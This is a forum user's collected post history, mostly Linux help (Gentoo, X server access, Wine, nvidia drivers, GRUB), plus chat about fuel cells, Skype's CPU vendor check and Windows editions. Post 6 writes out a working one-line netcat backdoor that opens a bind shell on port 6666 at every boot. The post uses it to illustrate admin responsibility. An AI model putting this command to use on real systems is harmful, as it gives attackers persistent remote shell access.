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Everything posted by qwijibow

  1. Ubnfortunatly.... Both Maths, and the laws of physics disagree with you... Hydrogen + Oxygen = Energy + Water. and therefore.... Water + Energy = Hydrogen + Oxygen. Theoretically, your sepeator would require the same amount of energy to spereate water into hydogren + oxygen as the fuel cell would generate.. making it kinda pointless. My Question is this...... Fuel cells are great and everything, but i can only think of 2 sources of Hydrogen..... 1) Electrolysis of water... wheich requires energy, pron fossil burning power stations, or other conventional means. 2) Chemical reactions, for example, Acids and metals. Fuel cells are just batteries... They are very efficiant, and can hold lots and lots of energy, but still, just batteries.. you need to charge them with somthing. Im still cheering for Fusion cold fusion would be nice.
  2. http://getkororaa.com/ I was drawn to Kororaa live CD for two reasons... 1) Its based on Gentoo Linux (possably the greatest distro ever) 2) Its live CD runs Gnome with Compiz window manager ontop of Xgl ! Currently, Both windows and Linux use a standard desktop with your Card in 2D mode. Xgl runs on-top of openGL, and everything is rendered in OpenGL 3D. The result, is quite literally breath taking. Everything is rndered in OpenGL, Everything is beatufully anti-aliassed. All windows, controls, popups fade in and out, and slide around yuor screed asif your monitors screen was an anti-stick frying pan, coated in hot lard. The windows are made from some kind of jelly, when you grab a corner, and drag it, it distorys, stretchiing,and wobbling a little when you lt go.. Imagine draging a wafer thin piece of un-breakable jelly around the screen. Apart from the beauty of it all, there are also some very VERY usefull features. In the past, transparent windows were pretty, but useless, and made the desktop less easy to use. but Compiz utilised this feature beautifully. For example, holding alt fades all windows, and the wallpaper, and brings up a bar containing previews of all windows on your desktop, then pressing tab cycles through all differant windows, and makes the currently selected indow Opaque, and all other transparent. releasing Alt brings the selected window to the front.. Pefect for cluttered desktops. And if that doesnt float your boat... clutter up your desktop, and hit F12. Each window is zoomed out... not just shrinked, but zoomed, a full screen window will hold the same, but take up less of the screen. all zoomed out windows are aranged nicely on your desktop. clicking one of the zoomed out windows returns all windows to normal sizze and position, but with the selected window at the front. And all of that is beautifullt animated, faded, slided, and jelly wobbled into place. And the first time you switch desktops... Especially when the focused window is set to follow you as you scroll.... well... its great. Ive spent literally the last 20 minutes just dragging windows, minimising and maximising. and im still very very very amused ! If you have a supported graphics card, listed here http://forums.xisto.com/no_longer_exists/ (basically, almost all ATI / Nvidia cards, and a few others) Then download this Live CD, slap it in and boot it. its a 400 meg download, but totally worth it. Im even going to attempt in install on my Amd64 Gentoo hard drive install. Go.. GO.. GOOO !
  3. i dont think it will. Rendering the X11 clients with OpenGL takes load away from the main CPU, and uses otherwise wasted GPU time... for those who dont have a GPU ( supported GPU, or powerfull enough GPU) they can just turn off the openGL and use normal x11. or VESA. Remember, this work only effects wndow managers, and X servers. this does not effect kernel developers, Apache / openSSL developers in the slightest. If for whatever reason this X server is un-secure, then any self-respecting distro packagers will not include it. This is a great thing.. I send many hours a day working at a computer screen, keeping it looking nice keeps me happy. an extra X server, is just extra choice, and we can never have too much choice.
  4. It always makes my laugh when i see super high speed internet adverts..For example Bulldog offers 8mbit connection ( with a 2gigabit a month limit )click the wrong button, maybe start downloading FreeBSD by accident, then go make a coffee.when you get back, your months bandwidth has gone.
  5. My questions......1) what level of access... are we talking about somthing like a SAMBA drive, or NFS drive...in other words..... can i re-format the file system ( for example, using an encrpyting device mapper... Possable oon NFS style protocols, but not SAMBA )2) is this going to be like google Eart, in the sence that its a Windows only thingamajig....
  6. on a correctly configured server, this worm is pretty lame. it does not attempt to exploit any privilage esculation exploits. and therefor is limited in access to the privilages of the running, exploitable server. basically, it has just enough access to pass on the worm to anouther exploitable server. this worm is basically an automated chain letter. The threat level of very low given in the link on post one seems very accurate. EDIT Linux rocks... its so insanely configuable, and its so easy to do anything. for example... one could program a back-door *torjan* in a single line.... echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local that code adds a line to the boot script that runs a command on every boot. that command listens on port 6666, and forwads all information that arives on port 6666 to bash... ( the comand line executor ) and in return, all bash output it sent back to the attacker via netcat. linux is very configuarable... and more and more computer ilitarates are using linux... how easy would it be to fool a linux newb to running the above command with root privilages... they dont know what it means. Any Operating system is only as secure as the Admin makes it. Security holes will always exist while less than perfect people hold the root password.
  7. the forst computer virus/worm spread by a buffer overflow in sendmail running on Unix systems. People were writing bad code before bill gates even though of starting microsoft.
  8. We have had quite a-lot of wild guesses, some from people blaming the OS before the disk has even had time to spin up, lol....anyways, after testing the PSU, i would agree that its probably a BIOS issue. My first computer suffered exact same symtoms (which diesnt necceserily prove that its the same problem)Unfortunatly for you... its usually easyer to replace the whole motherboard than it is to get a new bios chip, and then get that new bios chip flashed with the correct bios firmware.but with new motherboards as cheap as £15, who cares.
  9. Its been a long time since i read the install ionstructions, but i dont remember needing to re-run the Xserver config utility.From what i remember, you just need to edit the currently existing Xorg.confchange "Driver "nv"" for "Driver "nvidia""and possably increace the screen resolution if you so chose.just follow the step by step instructions provided by nvidia.I assume the nvidia driver has been built and you can successfully load the driver witj "modprobe nvidia" as root ?
  10. It seems some people have managed to trick skype into running in 10 persom mode on an AMD processor.So the claims about performace areofficially a blatant lie.James_KThis is what we as consumers want, we want AMD and Intel to compete with eachother so that us, the consumers get a bettr product.but anti-competative behaviour like this, crippleing software on opponenst hardware does not promote competition.What if a local car company built their cars in such a way that the car knew what make of tyers you were using, and if you were using a competitors tyers, the gearbox locked out 4th and 5th gear.forcing you to drive at moter-way speeds in 3rd gear.. destroying fuel efficiancy, costing you much more.when in-fact, the competitors tyres may be better products, that last longer, give greater traction and stopping distances, perhaps saving lives in emergancies...the competitor would go out of buisness, even though it had created a far superiror product.
  11. you need the source code what was used to create your current running kernel.its not enough to just download the corrct version from kernel.org.either find the kernel-source or linux-source package on your debian install cd'sor grab the latest kernel from kernel.org and re-compile.there are many tutorials on how to config and compile kernels over at linuxquestions.org
  12. SWEET...a few months ago i started ranting about how fantastic gentoo is, and hw its the best thing since the invention of Absinthe, and the performance benefints to home-compiling.I managed to convert one person ( even though his over-clocked ram melted part way though the compile )And now were all going Gentoo..I started a mini-revolution :PI believe i was the first person to add the Registed Linux user badge to my sig....Maybe next i will start seeing "powered by gentoo" bages poping up
  13. Follow the instructions that yiu downloaded with the Nvidia driver. to jump start you... from a terminal whilst loged in as a normal user. su -<password> or login as root in command line (dont login as root in graphical mode) im not sure about debian, but most linux distro's give you 7 login terminals, where the first 6 are command line, and the 7th is graphical X desktop. use ctrl+alt+FUNCTION_KEY to switch between login consoles... e.g. ctrl+alt+F7 to go to graphical login. ctrl+alt+F1 to login on the first command line terminal.
  14. All media players support mp3. but some distros remove the support on pre-compiled binaries. (for fear of being sued) there are 2 options.... 1) use a idfferant format, OGG is much better than mp3 in my opinion. 2) uninstall kubuntu's versinon of Xine, and use un-crippled Xine from http://www.xine-project.org/home you can convert mp3 to OGG with programs like sox http://sox.sourceforge.net/ ( might even be already installed on your system ) sox myMusic.mp3 myMusic.ogg sox reads the file extension to work out what formats to encode to, and virtually all sound formats are supported.
  15. followiung up from http://forums.xisto.com/topic/88802-topic/?findpost=1064338422 AMD are striking back... http://news.a.com.com/ Skype version 2.0 tests for the manufacturer of the CPU you are using to decide how many calls you cam make on skype. and only allows people who buy intel chips to make 10 person conferance calls. Skypes official excuse for this is... which is absolue rubbish ! If performance really is an issue, then they should restrict the calls based on chip PERFORMANCE, not VENDOR !
  16. Did you remember to set the "kdeenablefinal" USE flag ??? This use flag will slaughter your free memory, but dramatically reduce kde compile time. Since you have plenty of free ram, and the computer is dedicatde to compiling right now, i would recomend you give it a try. EDIT: Ive seen screen-shots of the installer, but i will have to wait untill they release the amd64 version. Personally, i dont understand why they didnt release amd64 at the same time as x86. They can leave the installer itself as 32bit, with a 6bit kernel (for the chroot) The installer itself can use all the same 32bit binaries as the x86 installer, it just needs to unpack a dirrerant base system. After all, the installer only needs to pass parameters to, and execute emerge.
  17. this is an X security feature. Allowing other users t access your X-session is to allow anyone on your network to log all your key strokes, mouse movements, and see your screen. You shoudlnt really need to run X clients as root directly, when you needroot priivilages to config somthing, KDE will prompt for the root password. if however ou do NEED to rubn one-off applications as root you can dissable the security feature temporerily with xhost - to re-enable, dubstitute - for a + Allowing any other people logging into your system to view your X session. however... Assuming that nobody else is loged into your computer, and X is NOT listening on tcp 6000 (or tcp 6000 is firewalled) its safe to do so. It seems on your distro, kde is defaulting to Secutiry, where as GNOME is defaulting to convinient. It differes from distro to distro. for Example, in my gentoo, X is configured NOT to listen on the network, and root user is allowed access to X from the machine running X server. ( same for KDE and GNOME )
  18. @Jeigh.... Gentoo is not like other Distro's Their is no "version" like for example, fedora 1,2,3. with gentoo, its just a question of, how long ago you last "emerge --sync && emerge -uDv world" dont think of Gentoo 2006 as a new gentoo version, its a new Gentoo Profile. you DONT need to re-install ! On my Gentoo 2005.1 system i am currently running... KDE-3.5.1, Gnome-2.12.2, GCC-3.4.4-r1, kernel-2.6.15-r5 ( with XFCE 4.2.2available ) my 2005.1 is running equaly up-to-date software, in in the case of KDE, more up to date software ( because i use the testing mask ~amd64 with KDE packages ) You can update your 2005.1 profile to 2006.0 in a few simple steps. see the link https://wiki.gentoo.org/wiki/Upgrading_Gentoo (specific documentation has not yet been released for 2006.0, but i would expect it to arive soon) One of the reasons why gentoo is s fantastic, so diferant from other distro's is the way it updates and installs, an hw it avoids re-installs. you dont need downtime to upgrade
  19. post your error messages.there are 1,000,001 things that could be the problem.error messages give vital clues, simply stating that it isnt working could mean anything.In your last posts, you said dreamweaver wasnt working with wine, when infact the actual problem was your Xorg configureation.
  20. your X server is rejecting the clients connection attempts. Mastercomputers is correct, Run wine as the same user as you are graphically loged into. alternatile use xhost to turn off this rather redundant security feature. the exact command is xhost - doing this will allow other users on your network to connect to your X server, (which is very bad, as they could remotly log keystrokes, or spy on you. make sure port 6000 is firewalled if X is listening for incomming connections. use netstat to test if X is listening on your network. netstat -lpn look for X listening on tcp port 6000. Unless you have been randomly deleting binaries, i dont see how this could help.
  21. http://news.bbc.co.uk/2/hi/technology/4754462.stm Confirmed. the 6 versions are.... So really, their are only 3 choises for home users, and 3 for buisness. Starter for low end PC's ( for developing countries, hopefully to stop software piracy ) Basic for everyone else. Premium for people willing to pay extra for things like Alpha Blended start menu. Personally, i dont think Starter will work very well. In developing countries, people will now have the option of an affordable legal OS, or a cheaper, pirated Full version of the OS. In a world where the authorities dont enfoce software laws, and the poor have little sympathy for the richest man in the world, i cant see them choosing Starter over Premium.
  22. anouther fantastic feature of grub (and probably lilo) is chainload. the chainload command passes control to anouther boot loader, justincase you want to do somthing crazy like boot windows. root (hdX) ( or (hdX,Y) where X is a disk number, and Y is a partition number)chainloader +1 (hand over control to the boot loader on the specified disk / partition) (ohh, and use rootnoverify for partitons with file-systems that grub cant read, like NTFS windows) So even if you went completely insane, and installed a differant boot loader for each non-windows Operating system, you could still boot all those differant boot loaders from the same boot disk.... head spinning..........? what im basically saying, is that GRUB (and lilo) are so very configureable, that no matter what horrible mess you make of your partiton tables, and disk layouts, grub will be able to handle it.
  23. to test the wine install, run "wine notepad" (or maybe "wine notepad.exe" ) If wine can run windows notepad, then wine is installed correctly. Wine is great, but its not finished. It doesnt yet fully support all win32 APIs And somtimes, the behaviour of its API's that it does support, can be slightly differant to what the windowsAPI behave. Microsoft dont fully document all their API's only the ones needed by Win32 developers. BASICALLY, dreamweaver may be working fine, and wine may also be working fine, but they may not work together. Try to decipher the meaning of the error message wine gives, then try to tweak the wine config file to compensate. For example, if wine mentions a an error with a win32 function XYZ, then find which dll file that function belongs to (google or MSDN) then look into the config file of wine, for what dll wine is using. for some dll's wine uses real windows dll's. for others, wine uses its own version of the dll's written by wine developers. you can sometimes change this in the wine config, if for example function XYZ belongs to dll ABC, and the config file says to use wines version of ABC.dll, then switch it to the ntive windows version of ABC.dll i know all that sounds complicated.. but running win32 inside a POSIX OS is complicated. EDIT: Ohh, and the best thing to try, is native linux versions or applications. I dont know if there are any windows versions of DreamWeaver, but there are some good money aplications. how would the linux accounting application GNUCash http://www.gnucash.org/ work for you ? Would this be a suitable replacement ?
  24. I can do the next best thing... Post a link to a great game programming tutorial. (well, not really a game programming tutorial, its an OpenGL tutorial, that uses games as its example programs. but still very good) http://nehe.gamedev.net/
  25. Is anyone else noticing a pattern here......1a) someone Mentions somthing possative about MS windows (goto 2a)1b) someone Mentions somthing negative about Ms windows ( goto 2b )2a) someone comments on how Linux does positive thing better, (goto 3)3) someone recomends that origonal poster uses Linux and surgests a distro.4) someone else recomends a differant distro and compares to origonal distro.5) Yet anouther 5 page distro comparason thread.Its nice that linux has such a strong following here at Xisto, but remember, Amiga fanatics killed the clearly superior platform, by preaching too much.Lets Not argue over linux Distro's int he Windows forum.Too many linux users remind me of Cult leaders hiding in the bushes outside churches sunday morning, waiting to pounce on any christian that looks less than extatic about his/her religion.
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